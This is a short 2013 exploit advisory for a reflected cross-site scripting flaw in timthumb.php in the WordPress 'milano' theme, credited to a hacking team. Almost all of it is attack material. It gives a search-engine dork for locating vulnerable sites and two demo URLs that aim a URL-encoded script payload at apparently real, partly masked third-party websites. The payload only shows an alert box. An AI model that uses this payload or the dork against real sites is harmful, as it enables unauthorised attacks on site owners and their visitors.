############## # Exploit Title : Wordpress milano Theme Cross Site Scripting # # Exploit Author : Ashiyane Digital Security Team # # Date : 2013 / 05 # # Home : www.Ashiyane.org # # Security Risk : Medium # # Dork : inurl:/wp-content/themes/milano/milano/timthumb.php?src= # # Tested on: Linux , Win 7 # ############## #Location:site/[path]/wp-content/themes/milano/milano/timthumb.php?src= # #DEm0: # http://acm.jaXXXana.edu.co/wp-content/themes/milano/milano/timthumb.php?src=%22/%3E%3CScript%3Ealert%28/%20XsseD%20bY%20Alireza666/%29%3C/script%3E # # http://luminXessa.ua/wp-content/themes/milano/milano/timthumb.php?src=%22/%3E%3CScript%3Ealert%28/%20XsseD%20bY%20Alireza666/%29%3C/script%3E # ############## #Greetz to: My Lord God ############## # # Alireza666 # ##############